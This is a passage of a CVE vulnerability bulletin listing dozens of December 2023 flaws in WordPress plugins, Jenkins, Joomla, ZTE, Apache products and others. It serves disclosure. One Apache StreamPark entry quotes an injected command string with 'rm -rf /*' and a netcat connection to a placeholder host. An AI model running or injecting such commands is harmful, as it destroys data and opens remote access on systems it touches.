wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS. This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6. 2023-12-15 5.9 CVE-2023-49190
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Supsystic GDPR Cookie Consent by Supsystic allows Stored XSS. This issue affects GDPR Cookie Consent by Supsystic: from n/a through 2.1.2. 2023-12-15 5.9 CVE-2023-49191
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Kyle Phillips Nested Pages allows Stored XSS. This issue affects Nested Pages: from n/a through 3.2.6. 2023-12-14 5.9 CVE-2023-49195
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Jeff Starr Dashboard Widgets Suite allows Stored XSS. This issue affects Dashboard Widgets Suite: from n/a through 3.4.1. 2023-12-14 5.9 CVE-2023-49743
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce. This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through 2.21.3. 2023-12-15 5.4 CVE-2023-49744
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WebFactory Ltd Guest Author allows Stored XSS. This issue affects Guest Author: from n/a through 2.3. 2023-12-15 5.9 CVE-2023-49747
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Stored XSS. This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24. 2023-12-15 5.9 CVE-2023-49767
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Peter Raschendorfer Smart External Link Click Monitor [Link Log] allows Stored XSS. This issue affects Smart External Link Click Monitor [Link Log]: from n/a through 5.0.2. 2023-12-14 5.9 CVE-2023-49770
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Themeum Tutor LMS – eLearning and online course solution allows Stored XSS. This issue affects Tutor LMS – eLearning and online course solution: from n/a through 2.2.4. 2023-12-15 5.9 CVE-2023-49829
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brontobytes Cookie Bar allows Stored XSS. This issue affects Cookie Bar: from n/a through 2.0. 2023-12-14 5.9 CVE-2023-49836
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in FancyThemes Optin Forms – Simple List Building Plugin for WordPress allows Stored XSS. This issue affects Optin Forms – Simple List Building Plugin for WordPress: from n/a through 1.3.3. 2023-12-14 5.9 CVE-2023-49841
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in wpexpertsio Rocket Maintenance Mode & Coming Soon Page allows Stored XSS. This issue affects Rocket Maintenance Mode & Coming Soon Page: from n/a through 4.3. 2023-12-14 5.9 CVE-2023-49842
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Apasionados, Apasionados del Marketing, NetConsulting DoFollow Case by Case. This issue affects DoFollow Case by Case: from n/a through 3.4.2. 2023-12-15 4.3 CVE-2023-49197
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in SureTriggers SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!. This issue affects SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!: from n/a through 1.0.23. 2023-12-15 4.3 CVE-2023-49749
audit@patchstack.com
wordpress — wordpress The WP Crowdfunding WordPress plugin before 2.1.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2023-12-11 4.8 CVE-2023-5757
contact@wpscan.com
wordpress — wordpress The WP Not Login Hide (WPNLH) WordPress plugin through 1.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2023-12-11 4.8 CVE-2023-5940
contact@wpscan.com
wordpress — wordpress The Contact Form Email WordPress plugin before 1.3.44 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2023-12-11 4.8 CVE-2023-5955
contact@wpscan.com
wso2 — wso2_api_manager Reflected XSS vulnerability can be exploited by tampering a request parameter in Authentication Endpoint. This can be performed in both authenticated and unauthenticated requests. 2023-12-15 6.1 CVE-2023-6838
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — wso2_api_manager Due to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response. 2023-12-15 5.3 CVE-2023-6839
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — wso2_api_manager Multiple WSO2 products have been identified as vulnerable due to lack of server-side input validation in the Forum feature, API rating could be manipulated. 2023-12-15 4.3 CVE-2023-6835
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — wso2_api_manager Multiple WSO2 products have been identified as vulnerable due to an XML External Entity (XXE) attack that abuses a widely available but rarely used feature of XML parsers to access sensitive information. 2023-12-15 4.6 CVE-2023-6836
ed10eef1-636d-4fbe-9993-6890dfa878f8
xaviershay-dm-rails_porject — xaviershay-dm-rails The xaviershay-dm-rails gem 0.10.3.8 for Ruby allows local users to discover MySQL credentials by listing a process and its arguments. 2023-12-12 5.5 CVE-2015-2179
cve@mitre.org
xunruicms — xunruicms XunRuiCMS v4.5.5 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /admin.php. 2023-12-11 6.1 CVE-2023-49490
cve@mitre.org
xwiki — xwiki_platform XWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for `objcontent:email*` using XWiki’s regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability. 2023-12-15 5.3 CVE-2023-50720
security-advisories@github.com
zammad — zammad An issue was discovered in Zammad before 6.2.0. It uses the public endpoint /api/v1/signshow for its login screen. This endpoint returns internal configuration data of user object attributes, such as selectable values, which should not be visible to the public. 2023-12-10 5.3 CVE-2023-50453
cve@mitre.org
zammad — zammad An issue was discovered in Zammad before 6.2.0. In several subsystems, SSL/TLS was used to establish connections to external services without proper validation of hostname and certificate authority. This is exploitable by man-in-the-middle attackers. 2023-12-10 5.9 CVE-2023-50454
cve@mitre.org
zammad — zammad An issue was discovered in Zammad before 6.2.0. An attacker can trigger phishing links in generated notification emails via a crafted first or last name. 2023-12-10 5.3 CVE-2023-50456
cve@mitre.org
zammad — zammad An issue was discovered in Zammad before 6.2.0. When listing tickets linked to a knowledge base answer, or knowledge base answers of a ticket, a user could see entries for which they lack permissions. 2023-12-10 4.3 CVE-2023-50457
cve@mitre.org
zoom — multiple_products Cryptographic issues in Zoom Mobile App for Android, Zoom Mobile App for iOS, and Zoom SDKs for Android and iOS before version 5.16.0 may allow a privileged user to conduct a disclosure of information via network access. 2023-12-13 4.9 CVE-2023-43583
security@zoom.us
zoom — zoom Improper authentication in some Zoom clients before version 5.16.5 may allow an authenticated user to conduct a denial of service via network access. 2023-12-13 6.4 CVE-2023-49646
security@zoom.us
zte — mc801a There is a buffer overflow vulnerability in some ZTE mobile internet products. Due to insufficient validation of tcp port parameter, an authenticated attacker could use the vulnerability to perform a denial of service attack. 2023-12-14 5.9 CVE-2023-25642
psirt@zte.com.cn
zte — multiple_products There is a denial of service vulnerability in some ZTE mobile internet products. Due to insufficient validation of Web interface parameter, an attacker could use the vulnerability to perform a denial of service attack. 2023-12-14 6.5 CVE-2023-25644
psirt@zte.com.cn
zte — multiple_products There is a SQL injection vulnerability in some ZTE mobile internet products. Due to insufficient input validation of SMS interface parameter, an authenticated attacker could use the vulnerability to execute SQL injection and cause information leak. 2023-12-14 4.3 CVE-2023-25651
psirt@zte.com.cn
zte — zxcloud_irai There is a weak folder permission vulnerability in ZTE’s ZXCLOUD iRAI product. Due to weak folder permission, an attacker with ordinary user privileges could construct a fake DLL to execute command to escalate local privileges. 2023-12-14 6.5 CVE-2023-25648
psirt@zte.com.cn
zte — zxcloud_irai There is an arbitrary file download vulnerability in ZXCLOUD iRAI. Since the backend does not escape special strings or restrict paths, an attacker with user permission could access the download interface by modifying the request parameter, causing arbitrary file downloads. 2023-12-14 6.5 CVE-2023-25650
psirt@zte.com.cn

Low Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Input Validation vulnerability. A low-privileged attacker could leverage this vulnerability to achieve a low-integrity impact within the application. Exploitation of this issue requires user interaction. 2023-12-15 3.5 CVE-2023-48608
psirt@adobe.com
apache — server A flaw was found in the mod_proxy_cluster in the Apache server. This issue may allow a malicious user to add a script in the ‘alias’ parameter in the URL to trigger the stored cross-site scripting (XSS) vulnerability. By adding a script on the alias parameter on the URL, it adds a new virtual host and adds the script to the cluster-manager page. The impact of this vulnerability is considered as Low, as the cluster_manager URL should not be exposed outside and is protected by user/password. 2023-12-12 3.5 CVE-2023-6710
secalert@redhat.com
apple — macos This issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.2. Secure text fields may be displayed via the Accessibility Keyboard when using a physical keyboard. 2023-12-12 2.4 CVE-2023-42874
product-security@apple.com
codeastro — pos_and_inventory_management_system A vulnerability was found in CodeAstro POS and Inventory Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /item/item_con. The manipulation of the argument item_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247911. 2023-12-13 3.5 CVE-2023-6775
cna@vuldb.com
fortinet — multiple_products An improper access control vulnerability [CWE-284] in FortiOS version 7.2.0, version 7.0.13 and below, version 6.4.14 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below may allow a remote unauthenticated attacker to bypass the firewall deny geolocalisation policy via timing the bypass with a GeoIP database update. 2023-12-13 3.1 CVE-2023-47536
psirt@fortinet.com
gitlab — gitlab An issue has been discovered in GitLab EE affecting all versions starting from 8.17 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible for auditor users to fork and submit merge requests to private projects they’re not a member of. 2023-12-15 2 CVE-2023-3511
cve@gitlab.com
h2o — h2o h2o is an HTTP server with support for HTTP/1.x, HTTP/2 and HTTP/3. The QUIC stack (quicly), as used by H2O up to commit 43f86e5 (in version 2.3.0-beta and prior), is susceptible to a state exhaustion attack. When H2O is serving HTTP/3, a remote attacker can exploit this vulnerability to progressively increase the memory retained by the QUIC stack. This can eventually cause H2O to abort due to memory exhaustion. The vulnerability has been resolved in commit d67e81d03be12a9d53dc8271af6530f40164cd35. HTTP/1 and HTTP/2 are not affected by this vulnerability as they do not use QUIC. Administrators looking to mitigate this issue without upgrading can disable HTTP/3 support. 2023-12-12 3.7 CVE-2023-50247
security-advisories@github.com
hcl_software — hcl_connections HCL Connections is vulnerable to an information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper handling of request data. 2023-12-15 3.5 CVE-2023-28022
psirt@hcl.com
nautobot — nautobot Nautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. In Nautobot 1.x and 2.0.x prior to 1.6.7 and 2.0.6, the URLs `/files/get/?name=…` and `/files/download/?name=…` are used to provide admin access to files that have been uploaded as part of a run request for a Job that has FileVar inputs. Under normal operation these files are ephemeral and are deleted once the Job in question runs. In the default implementation used in Nautobot, as provided by `django-db-file-storage`, these URLs do not by default require any user authentication to access; they should instead be restricted to only users who have permissions to view Nautobot’s `FileProxy` model instances. Note that no URL mechanism is provided for listing or traversal of the available file `name` values, so in practice an unauthenticated user would have to guess names to discover arbitrary files for download, but if a user knows the file name/path value, they can access it without authenticating, so we are considering this a vulnerability. Fixes are included in Nautobot 1.6.7 and Nautobot 2.0.6. No known workarounds are available other than applying the patches included in those versions. 2023-12-12 3.7 CVE-2023-50263
security-advisories@github.com
newsletter_software — supermailer Improper input validation vulnerability in Newsletter Software SuperMailer affecting version 11.20.0.2204. An attacker could exploit this vulnerability by sending a malicious configuration file (file with SMB extension) to a user via a link or email attachment and persuade the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to crash the application when attempting to load the malicious file. 2023-12-13 3.3 CVE-2023-6381
cve-coordination@incibe.es
palo_alto_networks — pan-os An improper privilege management vulnerability in Palo Alto Networks PAN-OS software enables an authenticated read-only administrator to revoke active XML API keys from the firewall and disrupt XML API usage. 2023-12-13 2.7 CVE-2023-6793
psirt@paloaltonetworks.com
sap — cloud_connector SAP Cloud Connector, version 2.0, allows an authenticated user with low privilege to perform a denial-of-service attack from an adjacent UI by sending a malicious request, which leads to low impact on availability and no impact on the confidentiality or integrity of the application. 2023-12-12 3.5 CVE-2023-49578
cna@sap.com
siemens — sinec_ins A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). The Web UI of affected devices does not check the length of parameters in certain conditions. This allows a malicious admin to crash the server by sending a crafted request to the server. The server will automatically restart. 2023-12-12 2.7 CVE-2023-48429
productcert@siemens.com
siemens — sinec_ins A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). The REST API of affected devices does not check the length of parameters in certain conditions. This allows a malicious admin to crash the server by sending a crafted request to the API. The server will automatically restart. 2023-12-12 2.7 CVE-2023-48430
productcert@siemens.com
typecho — typecho A vulnerability classified as problematic was found in Typecho 1.2.1. Affected by this vulnerability is an unknown functionality of the file /admin/manage-pages.php of the component Page Handler. The manipulation leads to backdoor. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247249 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-08 2.7 CVE-2023-6614
cna@vuldb.com
umbraco — umbraco Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.7.0, and 12.1.0, a user with access to a specific part of the backoffice is able to inject HTML code into a form where it is not intended. Versions 8.18.10, 10.7.0, and 12.1.0 contain a patch for this issue. 2023-12-12 3.5 CVE-2023-38694
security-advisories@github.com
wordpress — wordpress The Welcart e-Commerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.9.6 via the upload_certificate_file function. This makes it possible for administrators to upload .pem or .crt files to arbitrary locations on the server. 2023-12-09 2.7 CVE-2023-6120
security@wordfence.com


Severity Not Yet Assigned

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
acronis — acronis_cyber_protect_cloud_agent Sensitive information disclosure and manipulation due to missing authorization. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 36943. 2023-12-14 not yet calculated CVE-2023-48676
security@acronis.com
apache — dubbo A deserialization vulnerability existed when decoding a malicious package. This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue. 2023-12-15 not yet calculated CVE-2023-29234
security@apache.org
apache — dubbo Deserialization of Untrusted Data vulnerability in Apache Dubbo. This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue. 2023-12-15 not yet calculated CVE-2023-46279
security@apache.org
apache — shiro URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability when “form” authentication is used in Apache Shiro. Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+. 2023-12-14 not yet calculated CVE-2023-46750
security@apache.org
apache — streampark In streampark, there is a project module that integrates Maven’s compilation capability. However, there is no check on the compilation parameters of Maven, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2. Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use “||” or “&&”: /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 & 2023-12-15 not yet calculated CVE-2023-49898
security@apache.org
apache — streampark_platform In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The SQL syntax is: select * from table where jobName like ‘%jobName%’. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue. 2023-12-15 not yet calculated CVE-2023-30867
security@apache.org
apache — couchdb Design document functions which receive a user http request object may expose authorization or session cookie headers of the user who accesses the document. These design document functions are: list, show, rewrite, update. An attacker can leak the session component using an HTML-like output, insert the session as an external resource (such as an image), or store the credential in a _local document with an “update” function. For the attack to succeed the attacker has to be able to insert the design documents into the database, then manipulate a user to access a function from that design document. Workaround: Avoid using design documents from untrusted sources which may attempt to access or manipulate request object’s headers. 2023-12-13 not yet calculated CVE-2023-45725
security@apache.org
aveva — edge An issue was discovered in ExecuteCommand() in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior that allows unauthenticated arbitrary commands to be executed. 2023-12-16 not yet calculated CVE-2021-42796
cve@mitre.org
aveva — edge Path traversal vulnerability in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior allows an unauthenticated user to steal the Windows access token of the user account configured for accessing external DB resources. 2023-12-16 not yet calculated CVE-2021-42797
cve@mitre.org
buy_addons — bavideotab SQL injection vulnerability in Buy Addons bavideotab before version 1.0.6, allows attackers to escalate privileges and obtain sensitive information via the component BaVideoTabSaveVideoModuleFrontController::run(). 2023-12-14 not yet calculated CVE-2023-48925
cve@mitre.org
cams_biometrics — multiple_products SQL injection vulnerability in Cams Biometrics Zkteco, eSSL, Cams Biometrics Integration Module with HR Attendance (aka odoo-biometric-attendance) v. 13.0 through 16.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the db parameter in the controllers/controllers.py component. 2023-12-15 not yet calculated CVE-2023-48050
cve@mitre.org
cjson — cjson cJSON v1.7.16 was discovered to contain a segmentation violation via the function cJSON_InsertItemInArray at cJSON.c. 2023-12-14 not yet calculated CVE-2023-50471
cve@mitre.org
cjson — cjson cJSON v1.7.16 was discovered to contain a segmentation violation via the function cJSON_SetValuestring at cJSON.c. 2023-12-14 not yet calculated CVE-2023-50472
cve@mitre.org
common_services — soliberte SQL Injection vulnerability in functions/point_list.php in Common Services soliberte before v4.3.03 allows attackers to obtain sensitive information via the lat and lng parameters. 2023-12-14 not yet calculated CVE-2023-40921
cve@mitre.org
cybrosys_techno_solutions — website_blog_search A SQL injection vulnerability in Cybrosys Techno Solutions Website Blog Search (aka website_search_blog) v. 13.0 through 13.0.1.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the name parameter in controllers/main.py component. 2023-12-15 not yet calculated CVE-2023-48049
cve@mitre.org
dedebiz — dedebiz Cross Site Scripting (XSS) vulnerability in DedeBIZ v6.0.3 allows attackers to run arbitrary code via the search feature. 2023-12-14 not yet calculated CVE-2023-31546
cve@mitre.org
dreamer_cms — dreamer_cms Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/database/backup 2023-12-14 not yet calculated CVE-2023-50017
cve@mitre.org
emlog_pro — emlog_pro Emlog Pro v2.1.14 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /admin/article.php?active_savedraft. 2023-12-14 not yet calculated CVE-2023-41618
cve@mitre.org
emlog_pro — emlog_pro A Cross Site Scripting (XSS) vulnerability was discovered in Emlog Pro v2.1.14 via the component /admin/store.php. 2023-12-13 not yet calculated CVE-2023-41621
cve@mitre.org
empirecms — empirecms EmpireCMS v7.5 was discovered to contain a SQL injection vulnerability via the ftppassword parameter at SetEnews.php. 2023-12-14 not yet calculated CVE-2023-50073
cve@mitre.org
eyoucms — eyoucms A stored cross-site scripting (XSS) vulnerability in EyouCMS-V1.6.5-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Public Security Registration Number parameter. 2023-12-14 not yet calculated CVE-2023-50566
cve@mitre.org
fluid_components — fluid_components The fluid_components (aka Fluid Components) extension before 3.5.0 for TYPO3 allows XSS via a component argument parameter, for certain {content} use cases that may be edge cases. 2023-12-12 not yet calculated CVE-2023-28604
cve@mitre.org
freebsd — freebsd In versions of FreeBSD 14.0-RELEASE before 14-RELEASE-p2, FreeBSD 13.2-RELEASE before 13.2-RELEASE-p7 and FreeBSD 12.4-RELEASE before 12.4-RELEASE-p9, the pf(4) packet filter incorrectly validates TCP sequence numbers. This could allow a malicious actor to execute a denial-of-service attack against hosts behind the firewall. 2023-12-13 not yet calculated CVE-2023-6534
secteam@freebsd.org
freebsd — freebsd When a program running on an affected system appends data to a file via an NFS client mount, the bug can cause the NFS client to fail to copy in the data to be written but proceed as though the copy operation had succeeded. This means that the data to be written is instead replaced with whatever data had been in the packet buffer previously. Thus, an unprivileged user with access to an affected system may abuse the bug to trigger disclosure of sensitive information. In particular, the leak is limited to data previously stored in mbufs, which are used for network transmission and reception, and for certain types of inter-process communication. The bug can also be triggered unintentionally by system applications, in which case the data written by the application to an NFS mount may be corrupted. Corrupted data is written over the network to the NFS server, and thus also susceptible to being snooped by other hosts on the network. Note that the bug exists only in the NFS client; the version and implementation of the server has no effect on whether a given system is affected by the problem. 2023-12-13 not yet calculated CVE-2023-6660
secteam@freebsd.org
gradio-app — gradio-app/gradio Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository gradio-app/gradio prior to main. 2023-12-14 not yet calculated CVE-2023-6572
security@huntr.dev
grzegorz_marczynski — dynamic_progress_bar A SQL injection vulnerability in Grzegorz Marczynski Dynamic Progress Bar (aka web_progress) v. 11.0 through 11.0.2, v12.0 through v12.0.2, v.13.0 through v13.0.2, v.14.0 through v14.0.2.1, v.15.0 through v15.0.2, and v16.0 through v16.0.2.1 allows a remote attacker to gain privileges via the recency parameter in models/web_progress.py component. 2023-12-15 not yet calculated CVE-2023-40954
cve@mitre.org
h2oai — h2oai/h2o-3 External Control of File Name or Path in h2oai/h2o-3 2023-12-14 not yet calculated CVE-2023-6569
security@huntr.dev
hp — officejet_pro Certain HP OfficeJet Pro printers are potentially vulnerable to a Denial of Service when sending a SOAP message to the service on TCP port 3911 that contains a body but no header. 2023-12-14 not yet calculated CVE-2023-4694
hp-security-alert@hp.com
insyde — insydeh2o TOCTOU race-condition vulnerability in Insyde InsydeH2O with Kernel 5.2 before version 05.27.29, Kernel 5.3 before version 05.36.29, Kernel 5.4 version before 05.44.13, and Kernel 5.5 before version 05.52.13 allows an attacker to alter data and code used by the remainder of the boot process. 2023-12-16 not yet calculated CVE-2022-24351
cve@mitre.org
ivanti — connect_secure A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker can send a specific request which may lead to Denial of Service (DoS) of the appliance. 2023-12-16 not yet calculated CVE-2023-39340
support@hackerone.com
ivanti — connect_secure A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker impersonating an administrator may craft a specific web request which may lead to remote code execution. 2023-12-14 not yet calculated CVE-2023-41719
support@hackerone.com
ivanti — connect_secure A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker with a foothold on an Ivanti Connect Secure (ICS) appliance can escalate their privileges by exploiting a vulnerable installed application. This vulnerability allows the attacker to gain elevated execution privileges on the affected system. 2023-12-14 not yet calculated CVE-2023-41720
support@hackerone.com
jenkins — jenkins Jenkins Scriptler Plugin 342.v6a_89fd40f466 and earlier does not restrict a file name query parameter in an HTTP endpoint, allowing attackers with Scriptler/Configure permission to delete arbitrary files on the Jenkins controller file system. 2023-12-13 not yet calculated CVE-2023-50764
jenkinsci-cert@googlegroups.com
jenkins — jenkins A missing permission check in Jenkins Scriptler Plugin 342.v6a_89fd40f466 and earlier allows attackers with Overall/Read permission to read the contents of a Groovy script by knowing its ID. 2023-12-13 not yet calculated CVE-2023-50765
jenkinsci-cert@googlegroups.com
jenkins — jenkins A cross-site request forgery (CSRF) vulnerability in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allows attackers to send an HTTP request to an attacker-specified URL and parse the response as XML. 2023-12-13 not yet calculated CVE-2023-50766
jenkinsci-cert@googlegroups.com
jenkins — jenkins Missing permission checks in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allow attackers with Overall/Read permission to send an HTTP request to an attacker-specified URL and parse the response as XML. 2023-12-13 not yet calculated CVE-2023-50767
jenkinsci-cert@googlegroups.com
jenkins — jenkins A cross-site request forgery (CSRF) vulnerability in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allows attackers to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 2023-12-13 not yet calculated CVE-2023-50768
jenkinsci-cert@googlegroups.com
jenkins — jenkins Missing permission checks in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 2023-12-13 not yet calculated CVE-2023-50769
jenkinsci-cert@googlegroups.com
jenkins — jenkins Jenkins OpenId Connect Authentication Plugin 2.6 and earlier stores a password of a local user account used as an anti-lockout feature in a recoverable format, allowing attackers with access to the Jenkins controller file system to recover the plain text password of that account, likely gaining administrator access to Jenkins. 2023-12-13 not yet calculated CVE-2023-50770
jenkinsci-cert@googlegroups.com
jenkins — jenkins Jenkins OpenId Connect Authentication Plugin 2.6 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins, allowing attackers to perform phishing attacks. 2023-12-13 not yet calculated CVE-2023-50771
jenkinsci-cert@googlegroups.com
jenkins — jenkins Jenkins Dingding JSON Pusher Plugin 2.0 and earlier stores access tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system. 2023-12-13 not yet calculated CVE-2023-50772
jenkinsci-cert@googlegroups.com
jenkins — jenkins Jenkins Dingding JSON Pusher Plugin 2.0 and earlier does not mask access tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them. 2023-12-13 not yet calculated CVE-2023-50773
jenkinsci-cert@googlegroups.com
jenkins — jenkins A cross-site request forgery (CSRF) vulnerability in Jenkins HTMLResource Plugin 1.02 and earlier allows attackers to delete arbitrary files on the Jenkins controller file system. 2023-12-13 not yet calculated CVE-2023-50774
jenkinsci-cert@googlegroups.com
jenkins — jenkins A cross-site request forgery (CSRF) vulnerability in Jenkins Deployment Dashboard Plugin 1.0.10 and earlier allows attackers to copy jobs. 2023-12-13 not yet calculated CVE-2023-50775
jenkinsci-cert@googlegroups.com
jenkins — jenkins Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier stores PaaSLane authentication tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system. 2023-12-13 not yet calculated CVE-2023-50776
jenkinsci-cert@googlegroups.com
jenkins — jenkins Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier does not mask PaaSLane authentication tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them. 2023-12-13 not yet calculated CVE-2023-50777
jenkinsci-cert@googlegroups.com
jenkins — jenkins A cross-site request forgery (CSRF) vulnerability in Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier allows attackers to connect to an attacker-specified URL using an attacker-specified token. 2023-12-13 not yet calculated CVE-2023-50778
jenkinsci-cert@googlegroups.com
jenkins — jenkins Missing permission checks in Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified URL using an attacker-specified token. 2023-12-13 not yet calculated CVE-2023-50779
jenkinsci-cert@googlegroups.com
joomla — joomla A reflected XSS vulnerability was discovered in the LivingWord component for Joomla. 2023-12-14 not yet calculated CVE-2023-40627
security@joomla.org
joomla — joomla A reflected XSS vulnerability was discovered in the Extplorer component for Joomla. 2023-12-14 not yet calculated CVE-2023-40628
security@joomla.org
joomla — joomla SQLi vulnerability in LMS Lite component for Joomla. 2023-12-14 not yet calculated CVE-2023-40629
security@joomla.org
joomla — joomla Unauthenticated LFI/SSRF in JCDashboards component for Joomla. 2023-12-14 not yet calculated CVE-2023-40630
security@joomla.org
joomla — joomla A reflected XSS vulnerability was discovered in the Proforms Basic component for Joomla. 2023-12-14 not yet calculated CVE-2023-40655
security@joomla.org
joomla — joomla A reflected XSS vulnerability was discovered in the Quickform component for Joomla. 2023-12-14 not yet calculated CVE-2023-40656
security@joomla.org
joomla — joomla A reflected XSS vulnerability was discovered in the Joomdoc component for Joomla. 2023-12-14 not yet calculated CVE-2023-40657
security@joomla.org
joomla — joomla A reflected XSS vulnerability was discovered in the Clicky Analytics Dashboard module for Joomla. 2023-12-14 not yet calculated CVE-2023-40658
security@joomla.org
joomla — joomla A reflected XSS vulnerability was discovered in the Easy Quick Contact module for Joomla. 2023-12-14 not yet calculated CVE-2023-40659
security@joomla.org
